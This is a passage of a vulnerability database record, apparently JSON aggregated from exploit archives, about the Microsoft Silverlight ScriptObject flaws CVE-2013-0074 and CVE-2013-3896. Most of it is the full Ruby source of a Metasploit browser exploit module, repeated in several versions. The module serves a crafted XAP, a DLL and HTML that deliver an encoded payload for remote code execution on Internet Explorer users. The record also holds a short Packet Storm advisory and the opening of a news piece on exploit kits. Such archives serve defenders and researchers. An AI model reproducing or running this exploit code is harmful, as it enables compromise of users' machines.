else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://0day.today/exploit/21573"}, {"lastseen": "2018-04-10T05:36:13", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-03-23T00:00:00", "published": "2017-03-23T00:00:00", "href": "https://0day.today/exploit/description/27390", "id": "1337DAY-ID-27390", "type": "zdt", "title": "Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. 
This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'PACKETSTORM', '123731' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :silverlight => \"true\"\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86/x64', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n \r\n my_payload = get_payload(cli, target_info)\r\n \r\n # Align to 4 bytes the x86 payload\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + my_payload\r\n end\r\n \r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n \r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet 
-->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n \r\nend\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27390", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:57", "bulletinFamily": "exploit", "description": "", "modified": "2013-11-26T00:00:00", "published": 
"2013-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/124182/Microsoft-Internet-Explorer-COALineDashStyleArray-Unsafe-Memory-Access.html", "id": "PACKETSTORM:124182", "type": "packetstorm", "title": "Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \nMANIFEST = <<-EOS \n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\"> \n<Deployment.Parts> \n<AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" /> \n</Deployment.Parts> \n</Deployment> \nEOS \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\", \n'Description' => %q{ \nThis module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on \nthe Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an \nunsafe manner. Since it is accessible for untrusted code (user controlled) it's possible \nto dereference arbitrary memory which easily leverages to arbitrary code execution. In order \nto bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class \nfrom System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP \nSP3 / Windows 7 SP1 on both x32 and x64 architectures. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'James Forshaw', # RCE Vulnerability discovery \n'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-0074' ], \n[ 'CVE', '2013-3896' ], \n[ 'OSVDB', '91147' ], \n[ 'OSVDB', '98223' ], \n[ 'BID', '58327' ], \n[ 'BID', '62793' ], \n[ 'MSB', 'MS13-022' ], \n[ 'MSB', 'MS13-087' ], \n[ 'URL', 'http://packetstormsecurity.com/files/123731/' ] \n], \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n'EXITFUNC' => 'thread' \n}, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X86_64], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:ua_name => Msf::HttpClients::IE \n}, \n'Targets' => \n[ \n[ 'Windows x86', \n{ \n'arch' => ARCH_X86 \n} \n], \n[ 'Windows x64', \n{ \n'arch' => ARCH_X86_64 \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Mar 12 2013\", \n'DefaultTarget' => 0)) \n \nend \n \ndef setup \n@xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\" \n@dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\" \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read } \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read } \n@xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name) \nsuper \nend \n \ndef exploit_template(cli, target_info) \n \nmy_payload = get_payload(cli, target_info) \n \n# Align to 4 bytes the x86 payload \nif target_info[:arch] == ARCH_X86 \nwhile my_payload.length % 4 != 0 \nmy_payload = \"\\x90\" + my_payload \nend \nend \n \nmy_payload = Rex::Text.encode_base64(my_payload) \n \nhtml_template = <<-EOF \n<html> \n<!-- saved from url=(0014)about:internet --> \n<head> \n<title>Silverlight Application</title> \n<style type=\"text/css\"> \nhtml, body { height: 
100%; overflow: auto; } \nbody { padding: 0; margin: 0; } \n#form1 { height: 99%; } \n#silverlightControlHost { text-align:center; } \n</style> \n</head> \n<body> \n<form id=\"form1\" runat=\"server\" > \n<div id=\"silverlightControlHost\"> \n<object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\"> \n<param name=\"source\" value=\"<%= @xap_name %>\"/> \n<param name=\"background\" value=\"white\" /> \n<param name=\"InitParams\" value=\"payload=<%= my_payload %>\" /> \n</object> \n</div> \n</form> \n</body> \n</html> \nEOF \n \nreturn html_template, binding() \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"request: #{request.uri}\") \nif request.uri =~ /#{@xap_name}$/ \nprint_status(\"Sending XAP...\") \nsend_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelsif request.uri =~ /#{@dll_name}$/ \nprint_status(\"Sending DLL...\") \nsend_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelsif request.uri =~ /AppManifest.xaml$/ \nprint_status(\"Sending XAML...\") \nsend_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' }) \nelse \nprint_status(\"Sending HTML...\") \nsend_exploit_html(cli, exploit_template(cli, target_info)) \nend \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/124182/ms13_022_silverlight_script_object.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Memory content leakage.", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "SECURITYVULNS:VULN:13337", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13337", 
"title": "Microsoft Silverlight information leakage", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n+------------------------------------------------------------------------------+\r\n| Packet Storm Advisory 2013-1022-1 |\r\n| http://packetstormsecurity.com/ |\r\n+------------------------------------------------------------------------------+\r\n| Title: Microsoft Silverlight Invalid Typecast / Memory Disclosure |\r\n+--------------------+---------------------------------------------------------+\r\n| Release Date | 2013/10/22 |\r\n| Advisory Contact | Packet Storm (advisories@packetstormsecurity.com) |\r\n| Researcher | Vitaliy Toropov |\r\n+--------------------+---------------------------------------------------------+\r\n| System Affected | Microsoft Silverlight |\r\n| Versions Affected | Prior to 5.1.20125.0 (MS13-022) |\r\n| | Prior to 5.1.20913.0 (MS13-087) |\r\n| Related Advisory | MS13-022 / MS13-087 |\r\n| Related CVE Number | CVE-2013-0074 / CVE-2013-3896 |\r\n| Vendor Patched | 2013/03/12 / 2013/10/08 |\r\n| Classification | 1-day |\r\n+--------------------+---------------------------------------------------------+\r\n\r\n+----------+\r\n| OVERVIEW |\r\n+----------+\r\n\r\nThe release of this advisory provides exploitation details in relation to \r\nknown patched vulnerabilities in Microsoft Silverlight. These details were \r\nobtained through the Packet Storm Bug Bounty program and are being released \r\nto the community.\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+---------+\r\n| DETAILS |\r\n+---------+\r\n\r\nA memory disclosure vulnerability exists in the public WriteableBitmap class\r\nfrom System.Windows.dll. 
This class allows reading of image pixels from the \r\nuser-defined data stream via the public SetSource() method.\r\n\r\nBitmapSource.ReadStream() allocates and returns byte array and a count of array\r\nitems as out parameters. These returned values are taken from the input stream\r\nand they can be fully controlled by the untrusted code. When returned "count" \r\nis greater than "array.Length", then data outside the "array" are used as input \r\nstream data by the native BitmapSource_SetSource() from agcore.dll. Later all \r\ndata can be viewed via the public WriteableBitmap.Pixels[] property.\r\n\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+------------------+\r\n| PROOF OF CONCEPT |\r\n+------------------+\r\n\r\nThe full exploit code demonstrating code execution is available here:\r\nhttp://packetstormsecurity.com/files/123731/\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n+---------------+\r\n| RELATED LINKS |\r\n+---------------+\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-022\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms13-087\r\n\r\n+------------------------------------------------------------------------------+\r\n\r\n\r\n+----------------+\r\n| SHAMELESS PLUG |\r\n+----------------+\r\n\r\nThe Packet Storm Bug Bounty program gives researchers the ability to profit \r\nfrom their discoveries. You can get paid thousands of dollars for one day \r\nand zero day exploits. 
Get involved by contacting us at \r\ngetpaid@packetstormsecurity.com or visit the bug bounty page at: \r\n\r\nhttp://packetstormsecurity.com/bugbounty/\r\n\r\n\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n\r\niEYEARECAAYFAlJnHfEACgkQrM7A8W0gTbFKPACdGSp3GhRyvUjEzrNnlNejkGt+\r\npzQAoIeywymRBuPYbO9+OVGT59miZKuC\r\n=1UST\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "SECURITYVULNS:DOC:29990", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29990", "title": "[PSA-2013-1022-1] Microsoft Silverlight Invalid Typecast / Memory Disclosure", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-01-31T04:14:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. 
This module has been tested successfully on IE6 - IE10, Windows XP SP3 / Windows 7 SP1.", "modified": "2017-07-24T13:26:21", "published": "2013-11-22T22:41:56", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS13_022_SILVERLIGHT_SCRIPT_OBJECT", "href": "", "type": "metasploit", "title": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n MANIFEST = <<-EOS\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\n <Deployment.Parts>\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\n </Deployment.Parts>\n</Deployment>\n EOS\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access\",\n 'Description' => %q{\n This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. 
This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'James Forshaw', # RCE Vulnerability discovery\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-0074' ],\n [ 'CVE', '2013-3896' ],\n [ 'OSVDB', '91147' ],\n [ 'OSVDB', '98223' ],\n [ 'BID', '58327' ],\n [ 'BID', '62793' ],\n [ 'MSB', 'MS13-022' ],\n [ 'MSB', 'MS13-087' ],\n [ 'PACKETSTORM', '123731' ]\n ],\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => OperatingSystems::Match::WINDOWS,\n :ua_name => Msf::HttpClients::IE,\n :silverlight => \"true\"\n },\n 'Targets' =>\n [\n [ 'Windows x86/x64', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 12 2013\",\n 'DefaultTarget' => 0))\n\n end\n\n def setup\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\n super\n end\n\n def exploit_template(cli, target_info)\n\n my_payload = get_payload(cli, target_info)\n\n # Align to 4 bytes the x86 payload\n while my_payload.length % 4 != 0\n my_payload = \"\\x90\" + my_payload\n end\n\n my_payload = Rex::Text.encode_base64(my_payload)\n\n html_template = <<-EOF\n<html>\n<!-- saved from url=(0014)about:internet -->\n<head>\n <title>Silverlight Application</title>\n <style type=\"text/css\">\n html, body { height: 100%; overflow: auto; }\n body { 
padding: 0; margin: 0; }\n #form1 { height: 99%; }\n #silverlightControlHost { text-align:center; }\n </style>\n</head>\n<body>\n <form id=\"form1\" runat=\"server\" >\n <div id=\"silverlightControlHost\">\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\n <param name=\"background\" value=\"white\" />\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\n </object>\n </div>\n </form>\n</body>\n</html>\nEOF\n\n return html_template, binding()\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"request: #{request.uri}\")\n if request.uri =~ /#{@xap_name}$/\n print_status(\"Sending XAP...\")\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n elsif request.uri =~ /#{@dll_name}$/\n print_status(\"Sending DLL...\")\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n elsif request.uri =~ /AppManifest.xaml$/\n print_status(\"Sending XAML...\")\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\n else\n print_status(\"Sending HTML...\")\n send_exploit_html(cli, exploit_template(cli, target_info))\n end\n end\nend\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb"}], "exploitdb": [{"lastseen": "2016-02-03T11:16:31", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022). CVE-2012-0016,CVE-2013-0074. 
Remote exploit for windows platform", "modified": "2013-11-27T00:00:00", "published": "2013-11-27T00:00:00", "id": "EDB-ID:29858", "href": "https://www.exploit-db.com/exploits/29858/", "type": "exploitdb", "title": "Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access MS12-022", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n MANIFEST = <<-EOS\r\n<Deployment xmlns=\"http://schemas.microsoft.com/client/2007/deployment\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" EntryPointAssembly=\"SilverApp1\" EntryPointType=\"SilverApp1.App\" RuntimeVersion=\"4.0.50826.0\">\r\n <Deployment.Parts>\r\n <AssemblyPart x:Name=\"SilverApp1\" Source=\"SilverApp1.dll\" />\r\n </Deployment.Parts>\r\n</Deployment>\r\n EOS\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on\r\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\r\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\r\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\r\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\r\n from System.Windows.dll. 
This module has been tested successfully on IE6 - IE10, Windows XP\r\n SP3 / Windows 7 SP1 on both x32 and x64 architectures.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'James Forshaw', # RCE Vulnerability discovery\r\n 'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-0074' ],\r\n [ 'CVE', '2013-3896' ],\r\n [ 'OSVDB', '91147' ],\r\n [ 'OSVDB', '98223' ],\r\n [ 'BID', '58327' ],\r\n [ 'BID', '62793' ],\r\n [ 'MSB', 'MS13-022' ],\r\n [ 'MSB', 'MS13-087' ],\r\n [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X86_64],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows x86',\r\n {\r\n 'arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Windows x64',\r\n {\r\n 'arch' => ARCH_X86_64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 12 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def setup\r\n @xap_name = \"#{rand_text_alpha(5 + rand(5))}.xap\"\r\n @dll_name = \"#{rand_text_alpha(5 + rand(5))}.dll\"\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.xap\" ), \"rb\") { |f| @xap = f.read }\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"cve-2013-0074\", \"SilverApp1.dll\" ), \"rb\") { |f| @dll = f.read }\r\n @xaml = MANIFEST.gsub(/SilverApp1\\.dll/, @dll_name)\r\n super\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n\r\n my_payload = get_payload(cli, target_info)\r\n\r\n # Align to 4 bytes the x86 payload\r\n if target_info[:arch] == ARCH_X86\r\n while my_payload.length % 4 != 0\r\n my_payload = \"\\x90\" + 
my_payload\r\n end\r\n end\r\n\r\n my_payload = Rex::Text.encode_base64(my_payload)\r\n\r\n html_template = <<-EOF\r\n<html>\r\n<!-- saved from url=(0014)about:internet -->\r\n<head>\r\n <title>Silverlight Application</title>\r\n <style type=\"text/css\">\r\n html, body { height: 100%; overflow: auto; }\r\n body { padding: 0; margin: 0; }\r\n #form1 { height: 99%; }\r\n #silverlightControlHost { text-align:center; }\r\n </style>\r\n</head>\r\n<body>\r\n <form id=\"form1\" runat=\"server\" >\r\n <div id=\"silverlightControlHost\">\r\n <object data=\"data:application/x-silverlight-2,\" type=\"application/x-silverlight-2\" width=\"100%\" height=\"100%\">\r\n <param name=\"source\" value=\"<%= @xap_name %>\"/>\r\n <param name=\"background\" value=\"white\" />\r\n <param name=\"InitParams\" value=\"payload=<%= my_payload %>\" />\r\n </object>\r\n </div>\r\n </form>\r\n</body>\r\n</html>\r\nEOF\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n if request.uri =~ /#{@xap_name}$/\r\n print_status(\"Sending XAP...\")\r\n send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /#{@dll_name}$/\r\n print_status(\"Sending DLL...\")\r\n send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n elsif request.uri =~ /AppManifest.xaml$/\r\n print_status(\"Sending XAML...\")\r\n send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })\r\n else\r\n print_status(\"Sending HTML...\")\r\n send_exploit_html(cli, exploit_template(cli, target_info))\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29858/"}], "thn": 
[{"lastseen": "2018-01-27T09:17:42", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-pcFP_zbLVtk/U3yhWayfDAI/AAAAAAAAbvc/xfGpaMN_5f0/s1600/Netfli-Microsoft-Silverlight-Anglr-Exploit-Kit.jpg>)\n\nNetflix, the world\u2019s largest Internet Video Subscription service with more than 35.7 million customers in U.S alone, that runs on the [Microsoft](<https://thehackernews.com/search/label/Microsoft>) Silverlight platform, has now become a popular target for cybercriminals, as public awareness of Java and Flash flaws is increasing.\n\n \n\n\nSilverlight is a Microsoft\u2019s plug-in for streaming media on browsers, similar to [Adobe Flash Player](<https://thehackernews.com/search/label/Adobe%20Flash>), that handles multimedia contents on Microsoft Windows and Mac OS X Web Browsers, and is popularly known for being used in Netflix\u2019s streaming video service.\n\n \n\n\nBut, Netflix isn't the only service that works on Silverlight, many other multimedia services supports Silverlight.\n\n \n\n\nMalware and Exploit Kit developers are targeting Silverlight users as they aren't aware of the increasing proliferation of malware for the platform. Silverlight vulnerabilities are mostly exploited using drive-by download attacks to compromise victim\u2019s computers with malware, especially through malicious ads.\n\n \n\n\nA recent _Angler Exploit Campaign_ has been 